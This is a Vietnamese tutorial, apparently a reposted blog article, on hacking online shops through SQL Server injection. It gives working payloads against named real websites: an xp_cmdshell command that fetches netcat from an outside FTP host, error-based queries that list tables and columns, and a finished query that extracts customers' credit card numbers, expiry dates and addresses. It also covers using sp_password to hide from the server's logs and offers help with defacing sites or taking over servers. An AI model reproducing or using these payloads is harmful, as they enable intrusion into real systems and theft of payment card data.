UPLOAD NETCAT LÊN SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset(’sqloledb’, ’server=UNESCO;uid=BUILTIN\Administrators;pwd=’, ’set fmtonly off select 1 exec master..xp_cmdshell “echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af” %26 del f’)– (%3E == “>”)
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell ‘dir nx.exe’–
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))–
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))—
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘08/17/2003 11:31a 11,776 nx.exe’ to a column of data type int.
/Including/general.asp, line 840 .
Hack shop qua lỗi SQL server injection
gioi thieu so qua cho anh em biet ve hack sql server inject ha !
hack bang ky thuat convert noi nom na la convert 1 bieu thuc dang string sang dang int nhung ko the thuc hien duoc gay thong bao loi (co nhung shop ma ta khong nhan duoc thong bao cua no,vi value=hidden),vi the truoc tien de hack duoc shop ODBC MySQL server2000 hay 7.0 thi it nhat anh em cung phai xem qua source 1 chut ha,de roi con biet co nen hack theo cach nao`.
o day chi gioi thieu cach convert dung` de lay thong bao loi thoi,neu may bac’ can hack ca server thi noi nhieu,noi dai dong lam…
Detail:
search tren cac trang search engine tuy anh em thich thoi,hien co rat nhieu trang search engine ma anh em thuong dung nhu
www.google.com hoac www.froogle.google.com
www.av.com
www.alltheweb.com
yahoo.com
……
ok—-search for: allinurl: “/shop/viewproduct.asp” hoac may bac co the search = tu key word allinurl: “/shop/index.asp” (nhung cai tu khoa nay van chua xac nhan duoc tinh dung dan cua no,vi no cho ra tat rat nhieu site,ma ko phai ODBC MySQL database,hic,ma thuong la` JSP(java server page) hoac JET, hoac VB.net….net va de nay can phai co su no luc cua anh em trong viec test.
ok
co’ duoc muc tieu roi chon dai 1 thang,vd:
http://www.mcmessentials.com.au/shop…0&categoryid=5
okay co muc tieu roi bat dau test no ha
http://www.mcmessentials.com.au/shop/viewp…tegoryid=5′
neu CSDL cua no duoc viet = ODBC MySQL server thi anh em se nhan duoc thong bao sau
Code:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”.
/shop/include/viewproduct.asp, line 3
okay,con neu ko thi ko thay gi het,hoac la` ban phai xem trong source de biet.
ok bat dau tim table
co the test theo cac cach sau ma em da biet
Code:
;having 1=1–sp_password
‘having 1=1–sp_password
“having 1=1–sp_password
(having 1=1–sp_password
)having 1=1–sp_password
(space)having 1=1–_sp_password (%20 la space la khoang trang day)
thuong thi test = cau truy van (space)having 1=1–sp_password la duoc duyet qua ok
*luu y’ cac anh em 1 dieu rat can thiet
1–%2b co nghia la dau + nhung ma truyen truc tiep dau + vao se bi SQL filter mat bat buoc phai co –sp_password de marks log tranh bi phat hien
http://www.mcmessentials.com.au/shop…1–sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘categories.label’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/shop/include/viewproduct.asp, line 9
ta biet duoc table categories,column la label,bay gio ta di lay tat ca cac table cua column label thuoc table categories
bay gio di lay user_name cua shop thong qua cau truy van sau
%2bconvert(int,user_name())–sp_password
day du la`
http://www.mcmessentials.com.au/shop…)–sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘braunshop’ to a column of data type int.
/shop/include/viewproduct.asp, line 3
‘braunshop’ la truong user_name cua shop
*luu y
2–truong user_name() la de xac dinh user hien tai,neu no la dbo thi ta co kha nang hack thang vao ca server ma ko can quyen admin,con neu ko thi ta co nhung buoc trung gian de chiem,ok ta dung lai o viec lay cc tu shop ma thoi,ko noi den chuyen chiem ca server,much dich de anh em hoc hoi,va trao doi kinh nghiem la chinh,ko loi keo anh em pha hoai nghiem trong den bat cu ai khac nen toi chi post va dung lai o phan lay cc ma thoi,con neu ai co thu oan gi voi thang nao,muon deface,lay pass,lay root,lay server,host thi lien he voi toi
ok bay gio ta se lan luot lay cac table tren column label
lay table thu 1 thong qua cau truy van sau
Code:
%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables))–sp_password
day du la`
http://www.mcmessentials.com.au/shop…)–sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘categorieslist’ to a column of data type int.
/shop/include/viewproduct.asp, line 3
ok table 1 la ‘categorieslist’,muon lay table thu 2 thi phai dung den where table_name not in(’table1′)
cau truy van nhu sau:
Code:
%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%20table_nam e%20not%
20in(’categorieslist’)))–sp_password
http://www.mcmessentials.com.au/shop…)–sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘allorders’ to a column of data type int.
/shop/include/viewproduct.asp, line 3
table 2 la` ‘allorders’
muon lay table thu 3 va cac table co lai thi tiep tu lam tuong tu nhu lay table thu 2 vay
Code:
%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%20table_nam e%20not%
20in(’categorieslist’,’allorders’)))–sp_password
day la tat ca cac table cua shop vua lay duoc
Code:
‘categorieslist’,’allorders’,’categories’,’categor ymembers’,’deliveryZones’,’dtproperties’,’essorder s’,’fullorder’,’keywords’,
‘optiongroupmembers’,’optiongroups’,’optiongroupsl ist’,’optionmembers’,’options’,’optionslist’,’orde roptions’,’orderoptions-options’,’orderproducts’,’orderproducts-products’,’orders’,’products’,’products-categories’,’products-options’,’searchresults’,’sysconstraints’,’syssegm ents’
ok sau khi lay duoc tat ca cac table roi thi ban bat dau lay colum cua table,co 2 kieu lay column,1 la lay tat ca cac column,ko co muc dich gi hoac de kiem tra toan bo database,2 la` ta da xac dinh duoc can phai lay column trong table nao,sau do moi lay,toi thi chi lay column trong table nao co cc thoi,’allorders’ hoac ‘orders’
ok ta lay no thoi
cau truy van lay column dau tien la`
1—lay column tren tat ca cac table,ko can biet no thuoc table nao,lay den khi nao het thi thoi,cau truy van co dang
Code:
%2bconvert(int,(select top 1 column_name from information_schema.columns))–sp_password
duoc column1 roi thi dung where column_name not in(’column1′) ok ha
2–lay column tren table da xac dinh truoc
cau truy van nhu sau vi du toi lay column tren table orders
Code:
%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name =’orders’))–sp_password
http://www.mcmessentials.com.au/shop…)–sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘orderid’ to a column of data type int.
/shop/include/viewproduct.asp, line 3
column dau tien la` ‘orderid’
lay column thu 2 thi can them and column_name not in(’orderid’)
Code:
%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name =’orders’ and column_name not in(’orderid’)))–sp_password
http://www.mcmessentials.com.au/shop…)–sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘created’ to a column of data type int.
/shop/include/viewproduct.asp, line 3
va lan luot lay cho het cac column cua table ‘orders’
khi anh em da lay duoc tat ca cac column cua table ‘orders’roi thi chi con viec sau cung hap dan nhat ma thoi,do la lay cc,anh em hay viet thanh 1 cau truy van de lay cc dua vao tat ca cac column cua anh em nhan duoc,moi shop no co cac field database khac nhau,nhung hau het cac shop duoc search duoi dang allinurl: “/shop?viewproduct.asp” thi chi co 1 kieu truy van duy nhat,vi em da thu qua tat ca roi hhihihi cai nao cung ok ca
may anh em khoi mat cong xap xep lai de viet thang cau truy van chi cho met,toi dua luon cho anh em xai choi
lay cc dau tien
Code:
%2bconvert(int,(select%20top%201%20cardtype%2b’%20 Name:’%2bcardname%2b’%20addr:%20′%2baddress%2b’%20 suburb:%20′%
2bsuburb%2b’%20state:%20′%2bstate%2b’%20zip:%20′%2 bpostcode%2b’%20country:%20′%2bcountry%2b’%20phone :%20′%2bphone%
2b’%20email:%20′%2bemail%2b’%20cardnumber:%20′%2bc ardnumber%2b’%20expireymonth:%20′%2bexpirymonth%2b ‘%20year:%20′%
2bexpiryyear%20from%20orders))–sp_password
lay’ cc thu 2 thi ta them vao o sao ….from orders where cardnumber not in(’so card dau tien’)
va lan luot lay het cac credit card co tren do’
nhu cai shop o tren thi de dung cho may bac thuc tap va de co them kinh nghiem ma thoi,vi day chi de hoc hoi,ko nham muc dich pha hoai bat cu ai .
Link: http://phucjimy.wordpress.com/2008/04/02/ki%E1%BA%BFn-th%E1%BB%A9c-v%E1%BB%81-sql-injection-p3/
